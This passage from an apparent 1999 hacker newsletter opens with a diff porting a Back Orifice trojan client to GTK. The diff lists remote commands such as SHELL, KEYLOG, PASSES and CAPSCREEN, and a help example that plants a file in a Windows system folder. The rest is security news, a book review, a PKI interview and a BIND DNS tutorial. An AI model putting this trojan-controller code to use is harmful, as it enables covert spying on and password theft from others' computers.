+ GtkWidget *arg1Label, *arg2Label; + */ + + gtk_init (&argc, &argv); + initializeProbes(); + + // Initialize the UDP port + host = 0; + g_packet = 0; + g_password[0] = 0; + strcpy(cwd, "c:\\"); + if ( (udpsock = socket(PF_INET, SOCK_DGRAM, 0)) < 0) + { + perror("socket: "); + return(1); + } + memset(&sockaddr, 0, sizeof(sockaddr)); + sockaddr.sin_family = AF_INET; + sockaddr.sin_port = htons((u_short)clientport); + if ( (bind(udpsock, (struct sockaddr *)&sockaddr, sizeof(sockaddr))) < 0) + { + perror("bind: "); + return(1); + } + linger.l_onoff = 0; // dont linger + setsockopt(udpsock, SOL_SOCKET, SO_LINGER, (void *)&linger, sizeof(linger) ); + + + + // Create the window + window = gtk_window_new (GTK_WINDOW_TOPLEVEL); + gtk_window_set_title (GTK_WINDOW (window), "Gspot"); + gtk_container_border_width (GTK_CONTAINER (window), 5); + gtk_widget_set_usize (GTK_WIDGET (window), 500, 400); + gtk_signal_connect (GTK_OBJECT (window), "delete_event", + GTK_SIGNAL_FUNC (destroy), NULL); + gtk_signal_connect (GTK_OBJECT (window), "destroy", + GTK_SIGNAL_FUNC (destroy), NULL); + + // Create the table container + kitchenTable = gtk_table_new(4, 3, FALSE); + gtk_table_set_row_spacings( GTK_TABLE(kitchenTable), 2 ); + gtk_table_set_col_spacings( GTK_TABLE(kitchenTable), 2 ); + gtk_container_add (GTK_CONTAINER (window), kitchenTable); + gtk_widget_show(kitchenTable); + + // Use a CList item with one column for the commands + probeList = gtk_clist_new(1); + gtk_clist_set_selection_mode( GTK_CLIST(probeList), GTK_SELECTION_BROWSE ); +#if GTK_MINOR_VERSION >= 1 + probeScroll = gtk_scrolled_window_new( NULL, NULL ); + gtk_scrolled_window_set_policy( GTK_SCROLLED_WINDOW (probeScroll), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); + gtk_clist_set_shadow_type( GTK_CLIST(probeList), GTK_SHADOW_ETCHED_IN); +#else + gtk_clist_set_border(GTK_CLIST(probeList), GTK_SHADOW_ETCHED_IN); + gtk_clist_set_policy(GTK_CLIST(probeList), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC ); +#endif + gtk_clist_column_titles_passive(GTK_CLIST(probeList)); + gtk_clist_set_column_title(GTK_CLIST(probeList), 0, "Commands" ); + gtk_clist_column_titles_show(GTK_CLIST(probeList)); + gtk_clist_set_column_width(GTK_CLIST(probeList), 175, 0 ); + gtk_widget_set_usize (GTK_WIDGET (probeList), 175, 0); + pidx = 0; + while(probeArray[pidx].Name[0] != NULL) { + gtk_clist_append( (GtkCList*) probeList, probeArray[pidx].Name); + pidx++; + } + gtk_signal_connect (GTK_OBJECT(probeList), "select_row", + GTK_SIGNAL_FUNC(select_probe), NULL); +#if GTK_MINOR_VERSION >= 1 + gtk_table_attach( GTK_TABLE(kitchenTable), probeScroll, 0, 1, 0, 3, + GTK_FILL, GTK_FILL | GTK_EXPAND, 0, 0); + gtk_scrolled_window_add_with_viewport( GTK_SCROLLED_WINDOW (probeScroll), GTK_WIDGET (probeList) ); + gtk_widget_set_usize (GTK_WIDGET (probeScroll), 175, 0); + gtk_widget_show(probeScroll); +#else + gtk_table_attach( GTK_TABLE(kitchenTable), probeList, 0, 1, 0, 3, + GTK_FILL, GTK_FILL | GTK_EXPAND, 0, 0); +#endif + gtk_widget_show(probeList); + + // Help and Exe buttons + hbox = gtk_hbox_new(TRUE, 2); + gtk_table_attach( GTK_TABLE(kitchenTable), hbox, 0, 1, 3, 4, + GTK_FILL | GTK_SHRINK, GTK_SHRINK, 3, 3); + gtk_widget_show (hbox); + helpBUTTon = gtk_button_new_with_label("Help"); + gtk_signal_connect (GTK_OBJECT (helpBUTTon), "clicked", + GTK_SIGNAL_FUNC (helpDialog), currentProbe); + gtk_box_pack_start(GTK_BOX(hbox), helpBUTTon, TRUE, TRUE, 0); + gtk_widget_show (helpBUTTon); + + hbox = gtk_hbox_new(TRUE, 2); + gtk_table_attach( GTK_TABLE(kitchenTable), hbox, 1, 2, 3, 4, + GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3); + gtk_widget_show (hbox); + exeBUTTon = gtk_button_new_with_label("Execute"); + gtk_signal_connect (GTK_OBJECT (exeBUTTon), "clicked", + GTK_SIGNAL_FUNC (execute), currentProbe); + gtk_box_pack_start(GTK_BOX(hbox), exeBUTTon, TRUE, TRUE, 0); + gtk_widget_show (exeBUTTon); + + // Text area, not editable, but our returned info goes here. + hbox = gtk_hbox_new(FALSE, 2); + gtk_table_attach( GTK_TABLE(kitchenTable), hbox, 1, 3, 0, 1, + GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_FILL | GTK_EXPAND, 1, 1); + gtk_widget_show (hbox); + returnScreen = gtk_text_new(NULL, NULL); + gtk_text_set_editable(GTK_TEXT(returnScreen), FALSE); + gtk_text_set_word_wrap(GTK_TEXT(returnScreen), FALSE); + gtk_box_pack_start(GTK_BOX(hbox), returnScreen, TRUE, TRUE, 0); + gtk_widget_show (returnScreen); + rsScroll = gtk_vscrollbar_new (GTK_TEXT(returnScreen)->vadj); + gtk_box_pack_start(GTK_BOX(hbox), rsScroll, FALSE, FALSE, 0); + gtk_widget_show (rsScroll); + + + // Use vbox and label for text entries + vbox = gtk_vbox_new(FALSE, 2); + gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 1, 2, 1, 2, + GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3); + gtk_widget_show (vbox); + arg1Label = gtk_label_new("Unused:"); + gtk_misc_set_alignment (GTK_MISC (arg1Label), 0, 0); + gtk_box_pack_start(GTK_BOX(vbox), arg1Label, FALSE, FALSE, 0); + gtk_widget_show (arg1Label); + arg1Text = gtk_entry_new_with_max_length(ARGSIZE); + gtk_widget_set_usize(GTK_WIDGET(arg1Text), 100, 0); + gtk_widget_set_name(GTK_WIDGET(arg1Text), "arg1Text"); + gtk_box_pack_start(GTK_BOX(vbox), arg1Text, FALSE, FALSE, 0); + gtk_widget_show (arg1Text); + + vbox = gtk_vbox_new(FALSE, 2); + gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 2, 3, 1, 2, + GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3); + gtk_widget_show (vbox); + arg2Label = gtk_label_new("Unused:"); + gtk_misc_set_alignment (GTK_MISC (arg2Label), 0, 0); + gtk_box_pack_start(GTK_BOX(vbox), arg2Label, FALSE, FALSE, 0); + gtk_widget_show (arg2Label); + arg2Text = gtk_entry_new_with_max_length(ARGSIZE); + gtk_widget_set_usize(GTK_WIDGET(arg2Text), 100, 0); + gtk_widget_set_name(GTK_WIDGET(arg2Text), "arg2Text"); + gtk_box_pack_start(GTK_BOX(vbox), arg2Text, FALSE, FALSE, 0); + gtk_widget_show (arg2Text); + + + // Text entries for Host and Port + vbox = gtk_vbox_new(FALSE, 2); + gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 1, 2, 2, 3, + GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3); + gtk_widget_show (vbox); + hostLabel = gtk_label_new("Host:"); + gtk_misc_set_alignment (GTK_MISC (hostLabel), 0, 0); + gtk_box_pack_start(GTK_BOX(vbox), hostLabel, FALSE, FALSE, 0); + gtk_widget_show (hostLabel); + hostText = gtk_entry_new_with_max_length(ARGSIZE); + gtk_widget_set_usize(GTK_WIDGET(hostText), 100, 0); + gtk_widget_set_name(GTK_WIDGET(hostText), "hostText"); + gtk_entry_set_text(GTK_ENTRY(hostText), "127.0.0.1"); + strcpy(oldhost, "127.0.0.1"); + gtk_box_pack_start(GTK_BOX(vbox), hostText, FALSE, FALSE, 0); + gtk_widget_show (hostText); + + vbox = gtk_vbox_new(FALSE, 2); + gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 2, 3, 2, 3, + GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3); + gtk_widget_show (vbox); + portLabel = gtk_label_new("Port:"); + gtk_misc_set_alignment (GTK_MISC (portLabel), 0, 0); + gtk_box_pack_start(GTK_BOX(vbox), portLabel, FALSE, FALSE, 0); + gtk_widget_show (portLabel); + portText = gtk_entry_new_with_max_length(5); + gtk_widget_set_usize(GTK_WIDGET(portText), 100, 0); + gtk_widget_set_name(GTK_WIDGET(portText), "portText"); + sprintf(buff, "%i", PORT); + gtk_entry_set_text(GTK_ENTRY(portText), buff); + strcpy(oldport, buff); + gtk_box_pack_start(GTK_BOX(vbox), portText, FALSE, FALSE, 0); + gtk_widget_show (portText); + + vbox = gtk_vbox_new(FALSE, 2); + gtk_table_attach( GTK_TABLE(kitchenTable), vbox, 2, 3, 3, 4, + GTK_FILL | GTK_EXPAND | GTK_SHRINK, GTK_SHRINK, 3, 3); + gtk_widget_show (vbox); + passLabel = gtk_label_new("Password:"); + gtk_misc_set_alignment (GTK_MISC (passLabel), 0, 0); + gtk_box_pack_start(GTK_BOX(vbox), passLabel, FALSE, FALSE, 0); + gtk_widget_show (passLabel); + passText = gtk_entry_new_with_max_length(ARGSIZE); + gtk_widget_set_usize(GTK_WIDGET(passText), 100, 0); + gtk_widget_set_name(GTK_WIDGET(passText), "passText"); + gtk_signal_connect (GTK_OBJECT (passText), "changed", + GTK_SIGNAL_FUNC (update_value), + gtk_entry_get_text( GTK_ENTRY(passText) ) ); + gtk_box_pack_start(GTK_BOX(vbox), passText, FALSE, FALSE, 0); + gtk_widget_show (passText); + + // Show the window and start running + gtk_widget_show (window); + gtk_main(); + + return(0); + +} + diff -ruN bo/gspot.h bo_gspot/gspot.h --- bo/gspot.h Wed Dec 31 16:00:00 1969 +++ bo_gspot/gspot.h Thu Dec 24 17:16:12 1998 @@ -0,0 +1,73 @@ +#define PROBE_STR_MAX 30 + +struct probeListItem { + gchar Name[PROBE_STR_MAX + 1]; + gchar firstArg[PROBE_STR_MAX + 1[]; + gchar secondArg[[PROBE_STR_MAX + 1]; +} + + gchar *probes[63][1] = { "HOST", + "QUIT", + "PING", + "PINGLIST", + "SWEEP", + "SWEEPLIST", + "SHELL", + "STATUS", + "PASSWD", + "DIR", + "CD", + "DEL", + "GET", + "PUT", + "COPY", + "FIND", + "FREEZE", + "MELT", + "VIEW", + "REN", + "MD", + "RD", + "INFO", + "PASSES", + "DIALOG", + "KEYLOG", + "REBOOT", + "NETVIEW", + "NETCONNECT", + "NETDISCONNECT", + "NETLIST", + "RESOLVE", + "SHARELIST", + "SHAREADD", + "SHAREDEL", + "PROCLIST", + "PROCKILL", + "PROCSPAWN", + "LISTCAPS", + "CAPSCREEN", + "CAPFRAME", + "CAPAVI", + "SOUND", + "REDIRLIST", + "REDIRDEL", + "REDIRADD", + "APPADD", + "APPDEL", + "APPLIST", + "REGMAKEKEY", + "REGDELKEY", + "REGLISTKEYS", + "REGLISTVALS", + "REGDELVAL", + "REGSETVAL", + "HTTPON", + "HTTPOFF", + "TCPSEND", + "TCPRECV", + "LOCKUP", + "PLUGINEXEC", + "PLUGINKILL", + "PLUGINLIST"}; + + diff -ruN bo/helpstrings.h bo_gspot/helpstrings.h --- bo/helpstrings.h Wed Aug 5 21:35:31 1998 +++ bo_gspot/helpstrings.h Wed Dec 23 23:50:09 1998 @@ -11,7 +11,7 @@ char pinglisthelp[] = "\ PINGLIST - Pings a lits of ip addresses in a text file\n\ usage: pinglist localfilename\n\ - example: pinglist C:\bo\\bohosts"; + example: pinglist /home/uname/bo/bohosts"; char sweephelp[] = "\ SWEEP - Sweeps a subnet with ping packets\n\ @@ -21,7 +21,7 @@ char sweeplisthelp[] = "\ SWEEPLIST - Sweeps a list of subnets in a text file\n\ usage: sweeplist localfilename\n\ - example: sweeplist c:\\bo\\dialups"; + example: sweeplist /home/uname/bo/dialups"; char shellhelp[] = "SHELL - Opens a command shell"; @@ -49,13 +49,13 @@ char gethelp[] = "\ GET - Transfers a file from remote host to the local computer\n\ usage: get remotefilename localfilename\n\ - example: get c:\\warez\\photoshop.zip c:\\files\\photoshop5.zip\n\ + example: get c:\\warez\\photoshop.zip /home/uname/files/photoshop5.zip\n\ note: If localfilename is not provided file is stored in current local directory"; char puthelp[] = "\ PUT - Transfers a file from local computer to the remote host\n\ usage: put localfilename remotefilename\n\ - example: put c:\\bo\\boupdate.exe c:\\windows\\system\\b.exe\n\ + example: put /home/uname/bo/boupdate.exe c:\\windows\\system\\b.exe\n\ note: If remotefilename is not provided file is stored in current remote directory"; char copyhelp[] = "\ @HWA 41.0 Network Associates unveils middleware ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Network Associates unveils middleware By Tim Clark Staff Writer, CNET News.com April 5, 1999, 9:45 a.m. PT update Seeking to simplify security management, Network Associates today rolled out middleware for securing corporate networks against computer viruses, outside intruders, and internal hackers. Network Associates, which built its security product line through a series of acquisitions, also is rolling out additions to its security software lineup and releasing new versions of its existing security products. The company is stopping short of a full, centralized console that a security administrator could use to control all aspects of a corporation's network security. Instead, Network Associates is offering middleware, called Event Orchestrator, which coordinates how different pieces of its software communicate with each other. For example, the security middleware could transfer information about an attack, detected by Network Associates' CyberCop intrusion-detection software, to a Gauntlet firewall that could shut off the entryway the attacker was using. Among the new offerings: Client virtual private network (VPN) software that allows remote users to dial in securely to corporate networks over the Internet, instead of using dedicated lines or toll -free phone numbers. The VPN client is part of a new PGP VPN suite, named after one of the company's early acquisitions, Pretty Good Privacy. The suite includes VPN server software, the company's Gauntlet firewall, and a public key infrastructure (PKI) for issuing and managing digital certificates. The new VPN client, designed for mobile users or extranet connections with business partners, is built on PGP desktop encryption software that scrambles data sent via email or stored securely in files or on disks. The VPN suite is part of the "Active Security" suite that Network Associates is unveiling before today's opening day baseball game of the Oakland As against the New York Yankees, scheduled this evening in the newly renamed Network Associates Coliseum in Oakland. Network Associates also released version 5.0 of its Gauntlet firewall and CyberCop 5.0, its intrusion protection product that includes Sting, a decoy that lures hackers into parts of a network where they can be detected and caught. Network Associates also announced security partnerships with Microsoft for its proxy server and Windows 2000, Hewlett-Packard, Sun Microsystems, public key infrastructure firms Entrust, and VeriSign, Cigna, and systems integrators Ernst & Young, PricewaterhouseCoopers, KPMG, and GTE Government Systems. Network Associates began as an anti-virus software vendor, and its MacAfee anti-virus products are widely used. After merging with Network General in late 1997, the company changed its name to Network Associates and continued to acquired security companies and their products, including encryption firm PGP, firewall maker Trusted Information Systems, European antivirus vendor Doc Solomon, and intrusion -detection firm Secure Networks. But Network Associates' "suite strategy"--in which it offers a full line of security software--has drawn criticism. In a Forrester Research report published in late 1998 the research firm argued that "security suites are nothing more than point products cobbled together. By the time vendors properly integrate them, a shift in Fortune 1000 security buying patterns and security requirements will conspire to make monolithic suites irrelevant." Critics have contrasted the security suite strategy with the "best of breed" approach taken by other vendors who create individual products in separate security technologies. In recent months, Network Associates executives have been calling its offerings "a best-of-breed security suite." @HWA 42.0 Book review: "Hacker Proof" Lars Klander 1997 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "Rob Slade" BKHKRPRF.RVW 990228 "Hacker Proof", Lars Klander, 1997, 1-884133-55-X, U$54.95/C$74.95 %A Lars Klander lklander@jamsa.com %C 2975 S. Rainbow Blvd., Suite 1, Las Vegas, NV 89102 %D 1997 %G 1-884133-55-X %I Jamsa Press/Gulf Publishing Co. %O U$54.95/C$74.95 800-432-4112 fax 713-525-4670 starksm@gulfpub.com %P 660 p. + CD-ROM %T "Hacker Proof: The Ultimate Guide to Network Security" There is a great deal of information on security contained within this book. Unfortunately, it is presented without a cohesive framework. The overall impression is good. A lot of the forms that would make up a useful work are followed, such as a summary (rather ironically, in view of the scattered nature of the text, called "Putting It All Together") and a set of resources at the end of every chapter. The author seems to be easily distracted, continually jumping to the next, more sensational, topic. Although not divided into parts, the contents do have some logical divisions. Initially, we are presented with what seems to be intended as background material, although the scattergun approach leaves all of the synthesis up to the reader. Chapter one is a rather unfocussed introduction, talking as much about Internet technologies as about security. Errors are rather common, ranging from chunks missing out of sentences to figures with no cutlines to security weaknesses that are essentially duplicates of each other to mailing lists that haven't distributed material for years (with contact addresses that are even older). Theoretically the networking concepts and details in chapter two might aid in understanding system vulnerabilities, but in the fact of the book they do not seem to be used effectively. The discussion of firewalls does not provide sufficient information about either the needs, weaknesses, or possible inconveniences of the different types in chapter three. The material on encryption, in chapter four, mentions a number of the currently important standards, but the explanations are so flawed that the chapter could not be used to inform a decision on the strength or use of a cryptographic system. Material on the use of digital signatures is fairly short, and the remainder of chapter five rehashes, with really expanding, old ground. Another section tries to delve into more networking protocols. Chapter six, on HTTP (HyperText Transfer Protocol), is somewhat disjointed, and, again, fails to seriously examine the security implications. S-HTTP (Secure HyperText Transfer Protocol), in chapter seven, deals mostly with packets and commands, although it does have some limited discussion of function. The Secure Socket Layer (SSL) seems to look primarily at arcana rather than use. Chapter nine looks at a few common forms of attack, but presents information somewhat at random. Kerberos is reasonably well described in chapter ten. Some types of electronic commerce technology are mentioned in chapter eleven. There is an extremely limited look at auditing in chapter twelve, first for UNIX and then for NT. A very rough look at security issues within the Java programming language makes up chapter thirteen. Chapter fourteen's look at viruses has good basic explanations, but is unreliable in practice. The remaining chapters generally look at security for specific systems. Chapters fifteen to seventeen very quickly talk about individual security functions in NT, NetWare, and UNIX, but fail to analyze, for example, the effective rights granted by combinations of the different privilege granting mechanisms. SATAN (System Administrator's Tool for Analyzing Networks) for UNIX and Kane Security Analyst for NT get quick overviews in chapter eighteen. Chapter nineteen presents a number of security vulnerabilities with the Netscape and particularly the Internet Explorer Web browsers. CGI (Common Gateway Interface) form weaknesses are discussed in chapter twenty, but with so many different languages that the ultimate advice is simply don't make a mistake when programming. The final chapter is a reasonable look at security policies. However, with some many items missing from the background provided, the chance of producing a good policy at this point is relatively small. As with "Maximum Security" (cf. BKMAXSEC.RVW), this book attempts to cover the enormous field of security by throwing out as many bits as possible. Therefore large holes are apparent in the coverage. In addition, the book lacks an overall framework that could be used to build a security structure and point the way to vulnerabilities that were not addressed. For those who already are well comfortable with security as a concept, this volume does have a lot of references that might be of use. For those new to the topic, it is not reliable enough to start with. copyright Robert M. Slade, 1999 BKHKRPRF.RVW 990228 -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 43.0 The Year Of PKI (Public Key Infrastructure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: darek milewski http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/14/n03-14.47.htm Link The year of PKI The growing need for secure Web transactions will boost PKI implementations at Entrust Technologies By Matthew Nelson Network security has become a necessity with the spread of Internet commerce and the expansion of intranets to larger extranets. But with differing network systems, secure connections that are constantly updated can be a difficult proposition. One possible solution is the use of public key infrastructure (PKI) systems and digital certificates. To discuss PKI and what it means for the enterprise, InfoWorld Senior Writer Matthew Nelson recently sat down with John Ryan, chief executive officer of Entrust Technologies, one of the leading PKI system providers. InfoWorld: Do you consider 1999 the year of PKI? Ryan: There's no question that the recognition by companies that they will all need a PKI is now upon us, and we're seeing incredible acceleration of pilot activity and recognition across our customer base. So I think this year will be the year where people recognize they will definitely have a PKI in their enterprise and start the methodical planning to ensure they pick the right one. InfoWorld: Why is PKI seeing adoption now when it is a technology that has been around for quite awhile? Ryan: Not unlike the Internet [that] was around for almost 20 years before all of a sudden it took off, there's been some fundamental things that happened in the enterprise that have now driven the need, and made it a lower risk decision for the enterprise. The first was certificates, or PKI capabilities, which were embedded in the browsers. The next thing that happened was the major 20 vendors in the networking world -- the whole crew in networking and firewalls -- all standardized around a standard called IP SET [Secure Electronic Transaction], which includes digital certificates. So basically, each application in an enterprise now, or the major applications of an enterprise backbone, are including security as a fundamental element, which is forcing companies to consider a public key infrastructure. InfoWorld: What developments should IT managers expect to see during the next year? Ryan: I think you're going to see a much more wide-scale enablement of applications, which really is going to make it much simpler for the enterprise to install a PKI, because the applications will be ready to accept it. I also think you're going to see networks of trust being created. I think one of the first ones we saw was the banking community with their global trust organization, which is a high-value, high-trust network for Web-based electronic transactions. InfoWorld: Is there a problem with interoperability between different companies' digital certificates? Ryan: Fortunately, the industry standards that enable interoperability have now passed. But actually, we now can support interworking with VeriSign, GTE, Microsoft, Netscape, and others, today, in our product. So we actually do have full interoperability in our product and we can create webs of trust that include VeriSign or GTE certificate authorities, webbed with an Entrust certificate authority, into a network of PKI networking. And we really see that as an innovation that the market has not yet anticipated. The evolution will then give customers choices and the ability to scale their networks based on what they've bought to date. InfoWorld: Has that interoperability created a different kind of competition between Entrust and your competitors? Ryan: We have always worked with large enterprises and basically delivered a guaranteed security system that they could buy and integrate every application into it, and have single sign-on and consistent policies and practices. Our competitors are more focused around the authentication market. They don't provide encryption or digital signature, they really count on all the various applications to embed that technology. So we really don't compete that often, head-to-head. But I think you'll see, as we migrate through this year, a much larger movement with our service provider program. We have partnerships with many service providers, which are more analogous to the VeriSign model, but with the full Entrust product suite, combined with our ability to implement Entrust Worldwide, a global network that we've just created. We'll be able to create really hybrid PKI networks where a piece of the PKI is on the customer's premises, and controlled by them. Another piece of the PKI might be controlled by a service provider, and we can connect them together seamlessly to be able to enable PKI networking and then extend that web of trust to other companies, so that you can create a community of interest to conduct electronic commerce. InfoWorld: If digital certificates are all going to interoperate, how are companies going to differentiate themselves from their competitors? Ryan: That part is going to be an exciting revolution because it will evolve very similarly to the credit card business, and I believe that the card or the certificate will become a brand position. I might have a Citibank Certificate just like I have a Citibank MasterCard. And I can see that there will be a battle for that identity, and I really believe you're going to find there are credentials that you can use across a number of services, and that credential may be issued by a bank, or a telephone company, or a government. And then I think that most organizations who really care about branding and positioning will issue certificates to their customers. So a person will end up with probably the same number of certificates as they have credit cards. InfoWorld: Do you think the cessation of year-2000 projects is going to have an effect on the adoption of security products and specifically PKI systems? Ryan: Certainly there's no doubt, it's a very critical element that's on the mind of every CIO. I think it's helping accelerate PKI in the first six months of the year because I think behind year 2000, many of our corporate customers are telling us security is the next, No. 2 critical item. And they have to get it fixed, but they want to get going right away, before the latter part of the year comes when they're fearful that they're going to be a little bit busy with year-2000 testing, if they haven't got there yet. In the second half of the year, we've pretty much said it could slow down as far as implementation goes. But we actually think that people are going to solve a lot more of the problem than they thought, and are actually going to be in a position to have the ability to buy the technology for implementation in the year 2000. We're cautiously optimistic right now, but we actually see it as an accelerator in the short term, and then we'll be waiting and seeing what happens. We also have seen though -- without doubt -- once the year-2000 bug is done, everybody has said security will become the next No. 1 priority. So I think that that speaks well for the position that we see emerging in the enterprises. @HWA -=-----------------------------------------------------------------------=-- Special section, Port number assigments, setting up DNS and BIND under fBSD -=-----------------------------------------------------------------------=-- SP.01 Port # assigments ~~~~~~~~~~~~~~~~~ This comes up so frequently i've decided to include it in this issue - Ed (from http://www.isi.edu/in-notes/iana/assignments/port-numbers) Source Local copy (included in zipped version) @HWA SP.02 Setting up DNS and BIND under FreeBSD ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Featured Articles: DNS and BIND from http://www.freebsdzine.org/199902/features/dns.shtml ## DNS and BIND ## Damon Slachter [ razorz@jagged.net ] With domain names becoming the "thing to have" these days, some people are feeling left out. If you are one of those people this article just might be for you. I will be concentrating on the BIND implementation of DNS and hopefully, by the end of reading this you will have a fully functional bind server. What is BIND? BIND (Berkeley Internet Name Domain) was written by Kevin Dunlap for the 4.3BSD UNIX operating system as a implementation of the Domain Name System, or DNS. Since its early release for 4.3BSD, BIND has been ported to virtually all flavors of UNIX and Microsoft Windows NT. BIND has since been maintained by the Internet Software Consortium. Before we start I will be assuming you know basic unix commands such as ls, cd, cp, mkdir and others like it. If not, my best advise is to stick around in #FreeBSD on Undernet more often or find a basic unix tutorial. With this being said, your ready to enter the realm of DNS/Bind. Installing the bind8 server is a simple task and can be achieved by doing the following, # cd /usr/ports/net/bind8 # make # make install By executing these few commands you tell the makefile to download the source for bind8, compile it and then install it. Now that the Bind server is installed, we get into the config files themselves. # cd /etc # ls In the /etc directory you should have the file named.conf, if not lets make one, if so you must edit it anyhow. options { directory "/etc/namedb/"; // Config file directory }; zone "jagged.net" in { // Domain you control/own type master; file "db.jagged"; // the file used for domain config }; zone "159.243.207.in-addr.arpa" in { // IP address 207.243.159.x type master; file "db.207.243.159"; // Again, file that controls this }; zone "0.0.127.in-addr.arpa" in { // Local loop zone type master; file "db.127.0.0"; // file controlling this IP field }; zone "." in { // Default, root name servers type hint; file "db.cache"; // Cache file of Internic NS's }; Thats basically it for the /etc/named.conf file, here are a few pointers. Pointers for named.conf zone "159.243.207.in-addr.arpa" in { This line will be used for reverse information on the Class C IP block of 207.243.159.0/24. Do not use 159.243.207, use your actual IP address block, minus the last number. Now its time to get the actual domain database files (ie: db.jagged) setup. # cd /etc # mkdir namedb # ls You will need to ftp to rs.internic.net/domain/ and download named.root and then rename the file as db.cache and your good to go. This is where the reverse names for your IP's are created. In the /etc/namedb dir use your favorite editor, may it be vi, ee or pico and make 3 files. # pico db.127.0.0 In db.127.0.0 file you need the following: @ IN SOA ns1.jagged.net. ns2.jagged.net. ( 1 ; Serial # 10800 ; Refresh after 3 hours 3600 ; Retry after 1 hour 604800 ; Expire after 1 week 86400 ) ; Minimum TTL of 1 day IN NS ns1.jagged.net. IN NS ns2.jagged.net. 1 IN PTR localhost. The "IN NS nsX.jagged.net." lines can be replaced by your dns server's hostname such as sun.jagged.net. or hellspawn.jagged.net. You can also put your ISP's nameserver as the secondary one. ***** TIP: The serial # must be changed every time you edit the file if you want your records to be correctly updated. You can also create serial number in the YYYYMMDDTTTT format (Year, Month, Date, Time: 199901210230 or 9901210230 ****** Next, # pico db.207.243.159 207.243.159 would be replaced by your actual IP address, not the full address only the first 3 #'s. @ IN SOA ns1.jagged.net. ns2.jagged.net. ( 1 ; Serial 10800 ; Refresh after 3 hours 3600 ; Retry after 1 hour 604800 ; Expire after 1 week 86400 ) ; Minimum TTL of 1 day IN NS ns1.jagged.net IN NS ns2.jagged.net. 93 IN PTR jagged.net. This is the file where you will specify the reverse DNS for your internet IP address. In most cases you will not have reverse delegation over your IP (the ability to set this yourself), but you need to set it up anyways. The line 93 IN PTR jagged.net. is the actual line that specifies what this IP will reverse as, example: > nslookup 207.243.159.93 Server: jagged.net Address: 207.243.159.93 Name: jagged.net Address: 207.243.159.93 For a user with only a hostname such as sun.jagged.net you would just use 93 IN PTR sun.jagged.net. Now comes the fun part, creating your hostnames! # pico db.jagged Where jagged is the name of YOUR actual domain or the hostname your ISP has set for you, i.e.: sparcstation.jagged.net. You may still use the db.jagged file for this but you must specify sparcstation.jagged.net in the /etc/named.conf file. @ IN SOA ns1.jagged.net. ns2.jagged.net. ( 1 ; Serial 10800 ; Refresh after 3 hours 3600 ; Retry after 1 hour 604800 ; Expire after 1 week 86400 ) ; Minimum TTL of 1 day IN NS ns1.jagged.net. IN NS ns2.jagged.net. localhost IN A 127.0.0.1 jagged.net. IN A 207.243.159.93 ns1 IN CNAME jagged.net. ns2 IN CNAME jagged.net. ftp IN CNAME jagged.net. mail IN CNAME jagged.net. www IN CNAME jagged.net. jagged.net. IN MX mail.jagged.net. Here is a brief explanation of what these lines mean. jagged.net. IN A 207.243.159.93 This is the forward lookup for the jagged.net domain. www IN CNAME jagged.net. This creates a "sub domain" or hostname off the root domain jagged.net. The "IN MX" feature of BIND can only be described using a scenario like the following. Imagine you are a network admin and your company needs a separate server just for email. Sure, no problem, but now people have to send email to foobar@mail.jagged.net. This isn't a problem but foobar@jagged.net looks much better to you and your boss so you do the following: jagged.net. IN MX mail.jagged.net. Meaning the "Mail Exchange" jagged.net. points to mail.jagged.net. This command gets much more complicated so I will stop here. Now that all of your config files are ready you can now start the bind server. # /usr/local/sbin/named This starts the named server. ***** TIP: If you make changes to your db files just use the command killall -HUP named to reload your named server. ****** Now you are ready to test out your named server for the first time. You might want to change /etc/resolv.conf so it points to your name server: domain JAGGeD.net nameserver 207.243.159.93 Type nslookup and you should see something along the lines of > nslookup Default Server: jagged.net Address: 207.243.159.93 > If you don't see something close to this then something isn't configured right. Go back through the steps mentioned above and see if you typed something wrong. I hope you enjoyed the first edition of the DNS/Bind server startup guide and have found it useful. If you have ANY questions please feel free to join us in #FreeBSD on the Undernet IRC servers. My nickname is RazorZ and I would be more than happy to help you with any problems you might encounter. Good luck! -- Damon Slachter -- a.k.a. RazorZ AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Come.to/Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j http:/ 99 http:o http:/ login: sysadmin n99 httpi /come. password: tp://comn to/Can me.to/Cat c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h http:/ industry people to attend with booths and talks. 99 http:e /come. you could have a booth and presentation for the cost of p://comel http:/ little more than a doorprize (tba) contact us at our main n99http:i http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s http:/ for updates. This is the first Canadian event of its type invalid t 403 Fo and will have both white and black hat attendees, come out logged! ! 404 Fi and shake hands with the other side... *g* mainly have some IP locked ome.to fun and maybe do some networking (both kinds). see ya there! hostname http:/ x99http:x o/Canc x.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx 